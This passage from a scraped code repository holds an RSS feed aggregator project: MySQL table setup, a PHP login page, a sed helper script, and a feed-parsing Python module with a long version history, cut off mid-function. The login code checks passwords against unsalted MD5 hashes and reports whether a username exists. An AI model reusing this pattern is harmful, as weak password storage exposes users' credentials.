feed_sources\r\n );\r\n \"\"\")\r\ncursor.execute (\"DROP TABLE IF EXISTS feed_sources;\")\r\ncursor.execute (\"\"\"\r\n CREATE TABLE feed_sources\r\n (\r\n sid int(16) NOT NULL UNIQUE auto_increment,\r\n source_name varchar(32) NOT NULL,\r\n source_url varchar(256) NOT NULL,\r\n PRIMARY KEY (sid)\r\n );\r\n \"\"\")\r\ncursor.execute (\"DROP TABLE IF EXISTS feed_stories;\")\r\ncursor.execute (\"\"\"\r\n CREATE TABLE feed_stories\r\n (\r\n fid int(16) NOT NULL UNIQUE auto_increment,\r\n title varchar(256) NOT NULL,\r\n content varchar(256) NOT NULL,\r\n url varchar(256) NOT NULL,\r\n time_stamp int(16) NOT NULL,\r\n sid int(16) NOT NULL,\r\n gid int(16) NOT NULL,\r\n PRIMARY KEY (fid),\r\n FOREIGN KEY (sid) REFERENCES feed_sources,\r\n FOREIGN KEY (gid) REFERENCES feed_categories\r\n );\r\n \"\"\")\r\ncursor.execute (\"DROP TABLE IF EXISTS feed_categories;\")\r\ncursor.execute (\"\"\"\r\n CREATE TABLE feed_categories\r\n (\r\n gid int(16) NOT NULL UNIQUE auto_increment,\r\n category varchar(32) NOT NULL,\r\n PRIMARY KEY (gid)\r\n );\r\n \"\"\")\r\n\r\nconn.commit ()\r\ncursor.close ()\r\nconn.close ()\r\n" }, { "alpha_fraction": 0.5834242105484009, "alphanum_fraction": 0.5845147371292114, "avg_line_length": 23.783782958984375, "blob_id": "bddaaf34c9d8387e0ca96804d694f513d0869412", "content_id": "32f94efd2daa351cffd8a266a8b51c3e8567cd96", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 917, "license_type": "no_license", "max_line_length": 70, "num_lines": 37, "path": "/www/trunk/login.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\nrequire_once('common.php');\nrequire_once('db_init.php');\n\nsession_start();\n\nif(isset($_REQUEST['userName']) && isset($_REQUEST['userPassword']))\n {\n $sessionUser = User::find('username',$_REQUEST['userName']);\n if ($sessionUser == NULL)\n {\n\techo 'This username does not exist';\n\texit();\n }\n if($sessionUser->password == md5($_REQUEST['userPassword']))\n {\n\tif($sessionUser->email_confirmed)\n\t {\n\t $_SESSION['uid'] = $sessionUser->uid;\n\t $_SESSION['password'] = $sessionUser->password;\n\n\t header(\"Location: {$page_uri_base}\");\n\t }\n\telse\n\t {\n\t echo 'You have not yet confirmed your email. If you need the '.\n\t 'confirmation email to be resent, please click '.\n\t \"<a href=\\\"sendConfirmation.php?id={$sessionUser->id}\\\">\".\n\t 'here</a>.';\n\t }\n }\n else\n {\n\techo 'This password does not match the username. Please try again.';\n\texit();\n }\n }\n" }, { "alpha_fraction": 0.4571428596973419, "alphanum_fraction": 0.48571428656578064, "avg_line_length": 12.800000190734863, "blob_id": "9a2a61bb103ed287b1c75c69856378425c289134", "content_id": "3e52187fd9e11dd0f820b65d33488d3ad17c6e72", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 70, "license_type": "no_license", "max_line_length": 21, "num_lines": 5, "path": "/www/trunk/rss/stripFooter.sh", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\ntouch temp;\nsed '$d' < $1 > temp;\nsed '$d' < temp > $1;\n " }, { "alpha_fraction": 0.6682499051094055, "alphanum_fraction": 0.6862002611160278, "avg_line_length": 33.04224395751953, "blob_id": "e6479e24d68774a5ed925ee14d6106e0319bead5", "content_id": "07c43526991ffaadcc0c10df837f190c31bf6950", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 46740, "license_type": "no_license", "max_line_length": 153, "num_lines": 1373, "path": "/FeedRetriever.py", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.6\n\n# This is a sample \"driver\" to use a module called feedparser to\n# \tdownload, parse, and display RSS feed data.\n# To use this program, install Python 2.6.4.\n# Then go to http://code.google.com/p/feedparser/downloads/list\n# \tdownload feedparser-4.1.zip\n# Then, open a cmd shell, type: python setup.py install\n# Then, you can use this program as usual.\n\n\"\"\"\nVersion LOG\n\n1.0:\nElementary testing version\n\n2.0:\nAble to read RSS and eliminate some HTML trash\n\n3.0:\norganize some code and improved debug-ability\nReordered license information\nWeek 3 Demo version\n\n4.0: \nAble to read and process ATOM as well\n\n4.1:\nOrganized and commented in functions\nWeek 4 Demo version\n\n4.2:\nRevised the content processing function,\nAble to remove trash more robustly\n\n4.3:\nLeo testing edition\n\n4.3.1_TEST:\nNow get description before content for content field,\naffecting ATOM feeds only\nAlso changed _ContentCutter\n\n4.3.2_TEST:\nModularize more codes into helper functions\nOrganized the \"myfeed\" so that we can keep track which works and\nwhich does not work\n\n4.4_TEST:\nLeo modified _ContentCutter to ensure correctness\n\n5.0:\nRSS:\n\tImprove robustness against empty fields\n\tintroduce logging\n\tmake use of time function (converge all time into UNIX format)\n\tIntroduce Stories (list of list) to behave as specified\n\n5.1:\nFixed some confusing printout names\nATOM:\n\tImprove robustness against empty fields\n\tintroduce logging\n\tmake use of time function (converge all time into UNIX format)\n\tIntroduce Stories (list of list) to behave as specified\n\n5.2:\nFixed extra print statements\nImplement subsequent ContentCutting functions to further process impurities\n\t1: remove extra whitespace (__DuplicateSpace)\n\t2: remove all subsequent sentences if we find:\n\t\t\tmultiple packed \\n or \\n seperated with (spaces or tabs) (__AdsFilter)\n\t3: remove all words from end, up to a list of \"whitelist\" allowable ending\n\t\t\tif such ending is not detected, this \"remover\" does nothing (__AdsFilter)\n\n5.3:\nTesting of above codes works or not\nFixed bug by removing ':' as LegalEndings\nFixed bug of __AdsFilter on ending with 'H.264' using regular expression\nCurrently __AdsFilter does nothing towards non-ascii texts, and we do not aim to process those\nFixed bug of possibility of trailing whitespace and newlines (eg space after newline), which would escape __AdsFilter check\n\n5.3.1:\nCategory testing included, most RSS feeds have no such information\nmore testing feeds added\n\n5.4\nreplace '&lt;' '&gt;' unicode phrases. This is essential for __HTMLCutter to work\nreplace '&nbsp;' phrases. This seems to be the only HTML leftovers\nFixed possibility of RSS feed entries to have time stamp 0 (this case we use feed's time stamp)\n\n5.4.1\nModularize to work with driver script\n\n5.4.2\nAdded more simple filters (remove leading whitespace and \\n)\n\n6.0 Test\nIncluded database codes, given by Ricky\nALL PRELIMINARY CODINGS DONE\nTests pending (will be done soon afterwards)\n\n6.0.1 Test\nFixed some syntax errors\nFrom now on, testing is done on server, using python 2.6.5\nCode freeze for Friday discussion for concensus\n\n6.0.2 Test\nFixing feed title name matching, algorithm flaws\nFix to a point ON DUPLICATE KEY UPDATE c=c+1;\ncode freeze until solution found\n\n6.1 Beta\nNo \"compile\" error\nMore testings need to be done on more feeds\n\n6.1.1 Beta\nfixed some minor errors\ndefault debug flag is false, will not print unless exceptional case\nOnly one line feed title is displayed for each feed!\n\n6.1.2 Beta\nfixed some minor errors (;)\n\n6.1.3 Beta\nRealized more bugs on unicode, fixed (&mdash;)\nFixed some more index out of bound issue\n\n6.1.4 Beta Tested\nTested with email server, emails successfully sent\n\n6.2 Test\nImproving efficiency: checking time stamp before processing content\n\tavoiding need to remove extra stories later also\nCorrected some more stupid serious bugs (ContentCutter)\n\n6.3 Test\nAdd another Filter to filter away difficult-to-remove advertisements\n\tcurrently, most advertisements are deleted, all unit test case give \"perfect\" result\n\n6.3.1 Test\nDefaultly converted to non unicode before storing to database for united format\n\n6.3.2 Test\nFurther added more unicode conversion functions\n\n6.3.3 Test\nModified CutterHTML to handle wierd case (mismatching number of < >)\nreverted 6.3.1 change, as it may cause faulting error (crashes)\n\n6.3.4 Test\nResearched unicode again, trying another method to robustly convert\nall unicode to ascii for database \"insert\" and email servers, to avoid crashing\nbasically, its \"ignoring\" unconvertible char, rather than raising exception\n\n6.3.5 Test\nVerified stories output identical to 6.1.4\nOptimized the logic of __AdsFilter and __AdvAdsFilter\nThis is used for performance test\n\n6.3.6 Test\nAdded missing thing (from local version)\nAdding additional checks to avoid crashing due to these URLS\n\t- Valid URL but not a feed ('www.yahoo.com')\n\t- Invalid URL ('iaminvalid')\n\t- empty URL ('')\n\n6.4 Beta\nTested with Tim's Email server and totally 46 emails and texts sent\nAll received as intended\n\n6.5 Bug test\nFixing the duplicate email bug\nadded tons of print messages in default mode, to be removed later\nidentified bug reason, hypothesis made\n\n6.5.1 Test\nreplaced SQL code in UpdateFeed()\nAdded logic not to add existing entry\n\n6.6 Test\nAppearing seemed to work, now run it in server for a day to see\nModifying driver also to cooperate\n\n6.6.1 Test\nAdded even more unicode conversion as bugs found\n\n6.6.2 Test\nMake debug log look nicer\nTry to resolve bugs that title cant match in some rare scenarios\n\n6.6.3 Test\nChanged title to be normalized from unicode, avoid failure to match in rare case\nchanging story definition once again to contain more information\n# old story is [Feed Title, Entry Title, Entry Content, Entry Category, Entry URL, Entry Timestamp]\n# new story is [Feed Title, Feed URL, Entry Title, Entry Content, Entry Category, Entry URL, Entry Timestamp]\nThis will not affect email server in anyway\n\n6.6.4 Test\nchanged empty content \"default\" to nicer version as Matt suggested\n\n6.6.5 Beta\nThe 6.6.4 is tested, giving intended behaviour.\n*** Starting new branch below ***\n\n6.7 Test\nChange \"story\" is per feed specific, to facilitate improvement reducing on amount of email spent:\n[Feed Title, Feed URL, [Entry Titles], [Entry Contents], [Entry Categories], [Entry URLs], [Entry Timestamps]]\nadded more comments to make codes more readable\n\n6.8 Test\nFixed duplication email bug\n\n7.0 Beta\nUnless more bugs are found, this is the version for public demo\n\n7.0.1 Beta\nPut length limit of title to 255 also (in addition to content)\n\n7.1 Release\nFixed duplicate email bug!\n\n------ CODE FREEZE UNTIL BUGS FOUND -------\n------ USE 7.1 TO TEST! -----------------\n\nFuture:\nadd threads to parallelize processing data when a list of URL is obtained\n\n\"\"\"\n\n\n# handle time stamps\nimport time\n\n# handle regular expression\nimport re\n\n# import the module\nimport feedparser\n\n# handle unicode\nimport codecs\nimport unicodedata\n\n# handle database\nimport sys\nimport MySQLdb\n\n\n# define ending characters, and check it\n# return true if the char is an element of LegalEndings, false otherwise\n# verified logic\ndef __CheckEnding(ending):\n\tLegalEndings = [']', '...', '.', '!', '?', '\"', '\\'']\n\tEndings = set(LegalEndings)\n\t# is 'ending' in the set? Ture/False\n\tresult = ending in Endings\n\treturn result\n\n\n# a function to replace corresponding unicode to '<' and '>', for __CutterHTML to work\n# verified logic\ndef __PreHTMLUnicode(content):\n\tfor index in (range((len(content))-3)):\n\t\tending = index+4\n\t\tif (content[index:ending] == '&lt;'):\n\t\t\tnewcontent = content[:index] + '<' + content[ending:]\n\t\t\treturn __PreHTMLUnicode(newcontent)\n\t\tif (content[index:ending] == '&gt;'):\n\t\t\tnewcontent = content[:index] + '>' + content[ending:]\n\t\t\treturn __PreHTMLUnicode(newcontent)\n\treturn content\n\n\n# functions to replace corresponding unicode to ascii value\n# they are necessarily to help the python library, improving \"visual correctness\"\n# verified logic\ndef __ProHTMLUnicodeSpace(content):\n\tfor index in (range((len(content))-5)):\n\t\tending = index+6\n\t\tif (content[index:ending] == '&nbsp;'):\n\t\t\tnewcontent = content[:index] + ' ' + content[ending:]\n\t\t\treturn __ProHTMLUnicodeSpace(newcontent)\n\t\tif (content[index:ending] == '&#149;'):\n\t\t\tnewcontent = content[:index] + '.' + content[ending:]\n\t\t\treturn __ProHTMLUnicodeSpace(newcontent)\n\treturn content\n\ndef __ProHTMLUnicodeDash(content):\n\tfor index in (range((len(content))-6)):\n\t\tending = index+7\n\t\tif (content[index:ending] == '&mdash;'):\n\t\t\tnewcontent = content[:index] + '--' + content[ending:]\n\t\t\treturn __ProHTMLUnicodeDash(newcontent)\n\t\tif (content[index:ending] == '&#8217;'):\n\t\t\tnewcontent = content[:index] + '\\'' + content[ending:]\n\t\t\treturn __ProHTMLUnicodeDash(newcontent)\n\t\tif (content[index:ending] == '&#8211;'):\n\t\t\tnewcontent = content[:index] + '-' + content[ending:]\n\t\t\treturn __ProHTMLUnicodeDash(newcontent)\n\t\tif (content[index:ending] == '&#8212;'):\n\t\t\tnewcontent = content[:index] + '--' + content[ending:]\n\t\t\treturn __ProHTMLUnicodeDash(newcontent)\n\t\tif ((content[index:ending] == '&#8221;') or (content[index:ending] == '&#8220;')):\n\t\t\tnewcontent = content[:index] + '\"' + content[ending:]\n\t\t\treturn __ProHTMLUnicodeDash(newcontent)\n\t\tif (content[index:ending] == '&#8226;'):\n\t\t\tnewcontent = content[:index] + '.' + content[ending:]\n\t\t\treturn __ProHTMLUnicodeDash(newcontent)\n\treturn content\n\n\n# a function to remove duplicate whitespace in content\n# verified logic\ndef __DuplicateSpace(content):\n\tfor index in (range((len(content))-1)):\n\t\tending = index+2\n\t\tif (content[index:ending] == ' '):\n\t\t\tnewcontent = content[:index+1] + content[ending:]\n\t\t\treturn __DuplicateSpace(newcontent)\n\treturn content\n\n\n# remove trailing space and newlines\ndef __TrailingSpace(content):\n\tlast = len(content)-1\n\tif (last >= 0):\n\t\tif ((content[last] == '\\n') or (content[last] == ' ')):\n\t\t\treturn __TrailingSpace(content[:last])\n\t\telse:\n\t\t\treturn content\n\telse:\n\t\treturn content\n\n\n# remove leading space and newlines\ndef __LeadingSpace(content):\n\tlength = len(content)\n\tif (length > 0):\n\t\tif ((content[0] == '\\n') or (content[0] == ' ')):\n\t\t\treturn __LeadingSpace(content[1:])\n\t\telse:\n\t\t\treturn content\n\telse:\n\t\treturn content\n\n\n# a function to remove trash words at the end of content\n# lemma: There is no useful information after this syntax: 'legal_ending' [space]* \\n [space]* \\n\ndef __AdsFilter(content):\n\t# define CHARS_SET\n\tCHARS_SET = re.compile(r'[a-zA-Z0-9]')\n\tlast_legal_pos = 0\n\tendpos = 0\n\t# find last legal ending position\n\tfor index in range(len(content)):\n\t\tif (__CheckEnding(content[index])):\n\t\t\tlast_legal_pos=index\n\t# last_legal_pos if == 0, means cant remove anything\n\tif (last_legal_pos != 0):\n\t\tendpos = 0\n\t\tend = len(content)\n\t\tcurrent = last_legal_pos + 1\n\t\tnewcurr = 0\n\t\t# detect non-space position, from legal_ending_position to end\n\t\t# checking this: is it all space?\n\t\tfor index in range(current, end):\n\t\t\tif content[index] != ' ':\n\t\t\t\tnewcurr = index\n\t\t\t\tbreak\n\t\t# immediate end noticed, that means trailing whitespace only\n\t\t# newcurr == 0 since it is never assigned with 'index' above\n\t\tif (newcurr == 0):\n\t\t\treturn content[:current]\n\n\t\t# reaching here means found non-space chars (potentially trash)\n\t\t# setup the \"range\" properly..., start from last_legal_pos + 1\n\t\tnewcurr = current\n\t\t# extra code to proceed some special scenario (eg H.264) (basically preserve more characters)\n\t\t# effect: stop at the position when it can no longer find chars or digits after '.' eg\n\t\tfor index in range (newcurr, end):\n\t\t\tif (not (bool(CHARS_SET.search(content[index])))):\n\t\t\t\tcurrent = index\n\t\t\t\tbreak\n\t\t# now skip some space if there is any, set \"current\" to pos of \"first non-space\"\n\t\tnewcurr = current\n\t\tfor index in range (newcurr, end):\n\t\t\tif content[index] != ' ':\n\t\t\t\tcurrent = index\n\t\t\t\tbreak\n\n\t\t# check if multiple \\n following, only seperated by spaces if there is any\n\t\t# then we conclude anything afterwards are trash (likely ADs)\n\t\t# lemma: There is no useful information after this syntax: 'legal_ending' [space]* \\n [space]* \\n\n\t\tif (content[current] == '\\n'):\n\t\t\tcurrent = current + 1\n\t\t\tfor index in range(current, end):\n\t\t\t\tif (content[index] == '\\n'):\n\t\t\t\t\tendpos = index + 1\n\t\t\t\t\tbreak\n\t\t\t\tif ((content[index] != ' ') and (content[index] != '\\n')):\n\t\t\t\t\tendpos = 0\n\t\t\t\t\tbreak\n\t# do we really able to kill crap things? (checking endpos)\n\tif (endpos != 0):\n\t\treturn content[:endpos]\n\telse:\n\t\treturn content\n\n\n\n# an advanced function to remove more trash content\n# lemma: There is no useful information after former legal ending syntax,\n# when there are two legal ending syntax,\n# and, the previous one is immediately seperated by following syntax:\n# '2nd last legal ending' [space]* \\n [space]* \\n [space]* \\n [space]* \\n\ndef __AdvAdsFilter(content):\n\tlegal_pos = 0\n\tprevious_legal_pos = 0\n\tnl_count = 0\n\t\n\t# find last legal ending position\n\tfor index in range(len(content)):\n\t\tif (__CheckEnding(content[index])):\n\t\t\tprevious_legal_pos = legal_pos\n\t\t\tlegal_pos = index\n\n\tendpos = 0\n\t# legal_pos if == 0 or previous_legal_pos == 0, means cant remove anything\n\tif ((previous_legal_pos != 0) and (legal_pos != 0)):\n\t\t# check previous_legal_pos follows by the defined lemma condtions....\n\t\tend = len(content)\n\t\tcurrent = previous_legal_pos+1\n\t\tnewcurr = current\n\t\tfor index in range(newcurr, end):\n\t\t\tif (content[index] == '\\n'):\n\t\t\t\tnl_count = nl_count + 1\n\t\t\tif ((content[index] != '\\n') and (content[index] != ' ')):\n\t\t\t\tbreak\n\t\t\tif (nl_count == 4):\n\t\t\t\tendpos = current + 1\n\t\t\t\tbreak\n\n\tif (endpos != 0):\n\t\treturn content[:endpos]\n\telse:\n\t\treturn content\n\n\n# a function to remove trash, specifically HTML codes for content\ndef __CutterHTML(content):\n\tflag = 0\n\tfor index in range(len(content)):\n\t\tif (content[index] == '<'):\n\t\t\tstart_pos = index\n\t\t\tflag = 1\n\t\tif (content[index] == '>'):\n\t\t\tif (flag == 0):\n\t\t\t\tnewcontent = content[:index] + ' ' + content[index+1:]\n\t\t\t\treturn __CutterHTML(newcontent)\n\t\t\telse:\n\t\t\t\tend_pos = index\n\t\t\t\tbreak\n\n\tif (flag == 1): \t\t\n\t\tnew_content = content[:start_pos] + ' ' + content[end_pos+1:]\n\t\treturn __CutterHTML(new_content)\n\telse:\n\t\treturn content\n\n# a overall, main function to link up all content processing functions\n# this enable us to add more function (filters) without modifying many codes\ndef _ContentCutter(content):\n\tmycontent0 = __PreHTMLUnicode(content)\n\tmycontent1 = __CutterHTML(mycontent0)\n\tmycontent2 = __AdsFilter(mycontent1)\n\tmycontent2n = __AdvAdsFilter(mycontent2)\n\tmycontent3 = __DuplicateSpace(mycontent2n)\n\tmycontent4 = __TrailingSpace(mycontent3)\n\tmycontent5 = __ProHTMLUnicodeSpace(mycontent4)\n\tmycontent6 = __ProHTMLUnicodeDash(mycontent5)\n\tmycontent7 = __LeadingSpace(mycontent6)\n\treturn mycontent7\n\ndef _ContentCutterD(content):\n\t# a debugging content cutter to print intermediate value\n\t\"\"\"\n\tdebuglc = codecs.open('debuglc.txt', encoding='utf-8', mode='w')\n\tdebuglc.write('------\\n')\n\tdebuglc.write(content + '\\n')\n\tdebuglc.write('------\\n')\n\tmycontent0 = __PreHTMLUnicode(content)\n\tdebuglc.write('000000\\n')\n\tdebuglc.write(mycontent0 + '\\n')\n\tdebuglc.write('000000\\n')\n\tmycontent1 = __CutterHTML(mycontent0)\n\tdebuglc.write('111111\\n')\n\tdebuglc.write(mycontent1 + '\\n')\n\tdebuglc.write('111111\\n')\n\tmycontent2 = __AdsFilter(mycontent1)\n\tdebuglc.write('222222\\n')\n\tdebuglc.write(mycontent2 + '\\n')\n\tdebuglc.write('222222\\n')\n\tmycontent2n = __AdvAdsFilter(mycontent2)\n\tdebuglc.write('2n2n2n\\n')\n\tdebuglc.write(mycontent2n + '\\n')\n\tdebuglc.write('2n2n2n\\n')\n\tmycontent3 = __DuplicateSpace(mycontent2n)\n\tdebuglc.write('333333\\n')\n\tdebuglc.write(mycontent3 + '\\n')\n\tdebuglc.write('333333\\n')\n\tmycontent4 = __TrailingSpace(mycontent3)\n\tdebuglc.write('444444\\n')\n\tdebuglc.write(mycontent4 + '\\n')\n\tdebuglc.write('444444\\n')\n\tmycontent5 = __ProHTMLUnicodeSpace(mycontent4)\n\tdebuglc.write('555555\\n')\n\tdebuglc.write(mycontent5 + '\\n')\n\tdebuglc.write('555555\\n')\n\tmycontent6 = __ProHTMLUnicodeDash(mycontent5)\n\tdebuglc.write('666666\\n')\n\tdebuglc.write(mycontent6 + '\\n')\n\tdebuglc.write('666666\\n')\n\tmycontent7 = __LeadingSpace(mycontent6)\n\tdebuglc.write('777777\\n')\n\tdebuglc.write(mycontent7 + '\\n')\n\tdebuglc.write('777777\\n')\n\t\"\"\"\n\tprint '------'\n\tprint content\n\tprint '------'\n\tmycontent0 = __PreHTMLUnicode(content)\n\tprint '000000'\n\tprint mycontent0\n\tprint '000000'\n\tmycontent1 = __CutterHTML(mycontent0)\n\tprint '111111'\n\tprint mycontent1\n\tprint '111111'\n\tmycontent2 = __AdsFilter(mycontent1)\n\tprint '222222'\n\tprint mycontent2\n\tprint '222222'\n\tmycontent2n = __AdvAdsFilter(mycontent2)\n\tprint '2n2n2n'\n\tprint mycontent2n\n\tprint '2n2n2n'\n\tmycontent3 = __DuplicateSpace(mycontent2n)\n\tprint '333333'\n\tprint mycontent3\n\tprint '333333'\n\tmycontent4 = __TrailingSpace(mycontent3)\n\tprint '444444'\n\tprint mycontent4\n\tprint '444444'\n\tmycontent5 = __ProHTMLUnicodeSpace(mycontent4)\n\tprint '555555'\n\tprint mycontent5\n\tprint '555555'\n\tmycontent6 = __ProHTMLUnicodeDash(mycontent5)\n\tprint '666666'\n\tprint mycontent6\n\tprint '666666'\n\tmycontent7 = __LeadingSpace(mycontent6)\n\tprint '777777'\n\tprint mycontent7\n\tprint '777777'\n\t\n\treturn mycontent7\n\n# a helper function to display global feed information\ndef _DisplayGlobal(myfeed, type):\n\t# calculate how many \"entries\" in the feed\n\tn_entries = len(myfeed['entries'])\n\tprint 'There are' , n_entries , 'entries in the feed'\n\n\t# print details of the feeds (global):\n\tif myfeed.feed.has_key('title'):\n\t\tprint 'Feed Title:' , myfeed.feed.title\n\tif myfeed.feed.has_key('link'):\n\t\tprint 'Feed Link: ', myfeed.feed.link\n\tif (type == 'RSS'):\n\t\t#if myfeed.feed.has_key('description'):\n\t\t#\tprint 'Feed Description: ', myfeed.feed.description\n\t\tif myfeed.feed.has_key('date'):\n\t\t\tprint 'Feed Date: ', myfeed.feed.date\n\t\t\t# print 'Feed Date (in list form): ', myfeed.feed.date_parsed\n\telif (type == 'ATOM'):\n\t\t#if (myfeed.feed.has_key('subtitle') and (len(myfeed.feed.subtitle) != 0)):\n\t\t#\tprint 'Feed Subtitle:' , myfeed.feed.subtitle\n\t\tif myfeed.feed.has_key('updated'):\n\t\t\tprint 'Feed Date: ', myfeed.feed.updated\n\t\t\t# print 'Feed Date (in list form): ', myfeed.feed.updated_parsed\n\tif myfeed.feed.has_key('categories'):\n\t\tprint 'Feed Categories:' ,myfeed.feed.categories\n\telse:\n\t\tprint 'This feed does not contain category information'\n\n\treturn\n\n\n# a specialized function to parse and process RSS feeds\n#\tinput: f = local file to write to\n#\t\t log = local log for error\n#\t\t myfeed = feedparser parsed object\n# latest_ts = latest time stamp, of all feeds in the database\n# feedurl = the URL of the feed\n# output: A story, containing all new entries, as:\n# [Feed Title, Feed URL, [Entry Titles], [Entry Contents], [Entry Categories], [Entry URLs], [Entry Timestamps]]\n# Note, for no new entries, the output will be [] AND NOT:\n# [Feed Title, Feed URL, [], [], [], [], []]\n\ndef _RSS(f, log, myfeed, latest_ts, feedurl, debug):\n\t# intialize the story, and corresponding entries lists\n\t# story is [Feed Title, Feed URL, [Entry Titles], [Entry Contents], [Entry Categories], [Entry URLs], [Entry Timestamps]]\n\tstory = []\n\tentrytitle_list = []\n\tentrycontent_list = []\n\tentrycategory_list = []\n\tentryURL_list = []\n\tentry_ts_list = []\n\n\tif ((myfeed is None) or (myfeed.feed is None)):\n\t\treturn story\n\n\t# calculate how many \"entries\" in the feed\n\tn_entries = len(myfeed['entries'])\n\n\t# print details of the feeds (global):\n\tif (debug):\n\t\t_DisplayGlobal(myfeed,'RSS')\n\n\t# get feed title\n\tfeedtitle = 'Undefined'\n\tif myfeed.feed.has_key('title'):\n\t\tfeedtitle = myfeed.feed.title\n\t\tfeedtitle = unicodedata.normalize('NFKD', feedtitle).encode('ascii','ignore')\n\t\tfeedtitle = feedtitle[:240]\n\n\tprint 'Feed Title:' , feedtitle\n\n\tprint 'LC DEBUG LATEST_TS IN RSS', str(latest_ts)\n\t# write all entries parsed on local file\n\tfor count in range(n_entries):\n\t\t# check time_stamp of the entry before proceeding\n\t\t# to avoid processing something we will trash!\n\t\t# convert Universal Feed Parser generated time (tuple) into UNIX time\n\t\tUNIX_time = 0\n\t\tif myfeed.entries[count].has_key('date_parsed'):\n\t\t\tdate_parsed = myfeed.entries[count].date_parsed\n\t\t\tUNIX_time = int(time.mktime(date_parsed))\n\t\telif myfeed.feed.has_key('date'):\n\t\t\tdate_parsed = myfeed.feed.date_parsed\n\t\t\tUNIX_time = int(time.mktime(date_parsed))\n\n\t\tif ((UNIX_time == 0) or (UNIX_time > latest_ts)):\n\t\t\tif (debug):\n\t\t\t\tf.write('Entry ' + str(count+1) + ' Information:\\n')\n\t\t\t\tf.write('Feed Title: ' + feedtitle + '\\n')\n\t\t\t# get entry title\n\t\t\tentrytitle = 'Undefined'\n\t\t\tif myfeed.entries[count].has_key('title'):\n\t\t\t\tentrytitle = myfeed.entries[count].title\n\t\t\t\tentrytitle = unicodedata.normalize('NFKD', entrytitle).encode('ascii','ignore')\n\n\t\t\t\tif (debug):\n\t\t\t\t\tf.write('Entry Title: '+ entrytitle + '\\n')\n\t\t\telse:\n\t\t\t\tif (debug):\n\t\t\t\t\tf.write('Entry Title: Undefined' + '\\n')\n\t\t\t\tlog.write('Entry ' + str(count+1) + ' error: Entry title = Undefined\\n')\n\n\t\t\tentrytitle_list.append(entrytitle)\n\n\t\t\t# process content info (clear out HTML codes)\n\t\t\tcontent = myfeed.entries[count].description\n\n\t\t\tcontent = _ContentCutter(content)\n\t\t\tcontent = unicodedata.normalize('NFKD', content).encode('ascii','ignore')\n\t\t\tif (debug):\n\t\t\t\tf.write('Content: ' + content + '\\n')\n\n\t\t\t# get entry URL\n\t\t\tentryURL = ''\n\t\t\tif (myfeed.entries[count].has_key('link') and (len(myfeed.entries[count].link) != 0)):\n\t\t\t\tentryURL = myfeed.entries[count].link\n\t\t\t\tentryURL = unicodedata.normalize('NFKD', entryURL).encode('ascii','ignore')\n\t\t\telif (myfeed.entries[count].has_key('id') and (len(myfeed.entries[count].id) != 0)):\n\t\t\t\tentryURL = myfeed.entries[count].id\n\t\t\t\tentryURL = unicodedata.normalize('NFKD', entryURL).encode('ascii','ignore')\n\t\t\telse:\n\t\t\t\tentryURL = 'localhost'\n\t\t\t\tlog.write('Entry ' + str(count+1) + ' error: entryURL = localhost\\n')\n\n\t\t\tif (debug):\n\t\t\t\tf.write('Entry URL: ' + entryURL + '\\n')\n\n\t\t\tentryURL_list.append(entryURL)\n\n\t\t\t# write date of entries\n\t\t\tif (debug):\n\t\t\t\tf.write('Time Stamp: ' + str(UNIX_time) + '\\n')\n\t\t\t\tif (UNIX_time != 0):\n\t\t\t\t\tf.write('Time Stamp GMT DEBUG: ' + str(date_parsed[0]) + '/' + str(date_parsed[1]) + '/' + \\\n\t\t\t\t\tstr(date_parsed[2]) + ' ' + str(date_parsed[3]) + ':' + str(date_parsed[4]) + '\\n\\n')\n\t\t\t\telse:\n\t\t\t\t\tf.write('Time Stamp: 0\\n\\n')\n\t\t\tif (UNIX_time == 0):\n\t\t\t\tlog.write('Entry ' + str(count+1) + ' error: Time Stamp = 0\\n')\n\n\t\t\tentry_ts_list.append(UNIX_time)\n\n\t\t\t# make a story from above parsed content\n\t\t\t# story is [Feed Title, Feed URL, [Entry Titles], [Entry Contents], [Entry Categories], [Entry URLs], [Entry Timestamps]]\n\t\t\tif content == '':\n\t\t\t\tcontent = 'Feed brought to you by the Watercooler'\n\t\t\tentrycontent_list.append(content)\n\t\t\tentrycategory_list.append('Undefined')\n\t# end for ---------------------------------------------------------------------------------------------------------\n\tif (len(entry_ts_list) > 0):\n\t\tstory = [feedtitle, feedurl, entrytitle_list, entrycontent_list, entrycategory_list, entryURL_list, entry_ts_list]\n\n\t# CONSISTENCY CHECK\n\tcon1 = len(entrytitle_list)\n\tcon2 = len(entrycontent_list)\n\tcon3 = len(entrycategory_list)\n\tcon4 = len(entryURL_list)\n\tcon5 = len(entry_ts_list)\n\tif ((con1 != con2) or (con1 != con3) or (con1 != con4) or (con1 != con5)):\n\t\tprint 'CONSISTENCY CHECK FAILED IN RSS STORY '\n\t\tprint 'STORY IS:'\n\t\tprint str(story)\n\t\tprint '\\n'\n\n\treturn story\n\n\n# a specialized function to parse and process ATOM feeds\n#\tinput: f = local file to write to\n#\t\t log = local log for error\n#\t\t myfeed = feedparser parsed object\n# latest_ts = latest time stamp, of all feeds in the database\n# feedurl = the URL of the feed\n# output: A story, containing all new entries, as:\n# [Feed Title, Feed URL, [Entry Titles], [Entry Contents], [Entry Categories], [Entry URLs], [Entry Timestamps]]\n# Note, for no new entries, the output will be [] AND NOT:\n# [Feed Title, Feed URL, [], [], [], [], []]\n\ndef _ATOM(f, log, myfeed, latest_ts, feedurl, debug):\n\t# intialize the story, and corresponding entries lists\n\t# story is [Feed Title, Feed URL, [Entry Titles], [Entry Contents], [Entry Categories], [Entry URLs], [Entry Timestamps]]\n\tstory = []\n\tentrytitle_list = []\n\tentrycontent_list = []\n\tentrycategory_list = []\n\tentryURL_list = []\n\tentry_ts_list = []\n\n\tif ((myfeed is None) or (myfeed.feed is None)):\n\t\treturn story\n\n\t# calculate how many \"entries\" in the feed\n\tn_entries = len(myfeed['entries'])\n\n\t# print details of the feeds (global):\n\tif (debug):\n\t\t_DisplayGlobal(myfeed,'ATOM')\n\n\t# get feed title\n\tfeedtitle = 'Undefined'\n\tif myfeed.feed.has_key('title'):\n\t\tfeedtitle = myfeed.feed.title\n\t\tfeedtitle = 